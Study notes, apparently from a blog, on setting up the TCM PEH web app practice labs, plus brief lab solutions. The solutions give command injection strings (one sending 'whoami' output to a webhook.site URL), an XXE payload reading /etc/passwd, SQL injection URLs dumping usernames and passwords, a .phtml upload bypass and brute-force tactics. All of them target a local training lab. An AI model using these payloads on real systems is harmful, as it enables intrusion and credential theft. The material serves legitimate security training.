> For the complete documentation index, see [llms.txt](https://blog.syselement.com/tcm/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.syselement.com/tcm/courses/peh/6-webapp/1-web-lab.md).

# Web App Lab Setup

> **Lab Requirements**
>
> * 1 Kali Linux VM
> * [pimpmykali](https://github.com/Dewalt-arch/pimpmykali/blob/master/pimpmykali.sh)
>   * (optional) [peh-web-labs.tar.gz](https://cdn.fs.teachablecdn.com/CbIyLkOuS4GUH7TNFTFg)
> * [Burp Suite](https://portswigger.net/burp/releases)

* Run `pimpmykali.sh` with `E` selection for **PEH Course WebApp Labs**

```bash
# Clone a Github repository in the "/opt" dir
cd /opt
sudo rm -rf pimpmykali/
sudo git clone https://github.com/Dewalt-arch/pimpmykali

sudo /opt/pimpmykali/pimpmykali.sh
# Run menu option E for the WebApp Labs
# The labs start automatically

# To START the labs
cd $HOME/peh/labs
./start-peh-labs.sh

# To (only) STOP the labs
sudo docker stop $(sudo docker ps -aq)

# To STOP and CLEANUP the labs
cd $HOME/peh/labs
./cleanup-peh-labs.sh
# This script removes ALL DOCKER CONTAINERS and NETWORKS!!!
```

* Run Burp Suite and open its proxy browser
* Browse to `http://localhost`
* The database can be initialized/reset at `http://localhost/init.php`

***

> ## Lab solutions
>
> ### Command Inj 0x02
>
> `https://tcm-sec.com/& whoami& asd` `https://tcm-sec.com/ | sleep 10 | asd`
>
> `https://webhook.site/<id>/?`whoami\`\`
>
> ### Command Inj 0x03
>
> `45123)^2))}';whoami;#`
>
> ### File upload 0x01
>
> * Intercept
> * Change contents
> * Or turn off JS
>
> ### File upload 0x02
>
> * Bypass the client-side again
> * Intercept and change the content-type to image/png or image/jpeg
>
> ### File upload 0x03
>
> * Bypass the client-side again
> * Intercept and change the content-type again
> * Use an extension that's not in the blocklist (.phtml)
>
> ### Authentication 0x01
>
> * Brute force
>
> ### Authentication 0x02
>
> * MFA code, switch username (code is OK for all users)
> * Or, just brute the code
>
> ### Authentication 0x03
>
> * Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
> * common password list:
>
> ```
> password
> password123
> letmein
> manchesterunited
> ```
>
> * common usernames list: `/usr/share/seclists/Usernames/Names/names.txt`
>
> ### XXE, IDOR, capstone
>
> #### XXE 0x01
>
> ```
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE creds [
> <!ELEMENT creds ANY >]>
> <creds><user>username</user><password>pass</password></creds>
> ```
>
> ```
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE creds [
> <!ELEMENT creds ANY >
> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
> <creds><user>&xxe;</user><password>pass</password></creds>
> ```
>
> #### IDOR
>
> `fuzz the parameter`
>
> * find an admin user (or all of the admin users)
>
> #### Capstone
>
> SQLi to get into admin panel File upload to get RCE
>
> * XSS in the message alert
> * XSS in account names probably? need to test
> * brute force user accounts
> * SQLi on adding rating
>
> `http://localhost/capstone/coffee.php?coffee=3' or 1=1-- -`
>
> `http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20from%20users--%20-`
>
> ## To do list
>
> * file upload capstone
> * auth0x03 testing


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://blog.syselement.com/tcm/courses/peh/6-webapp/1-web-lab.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
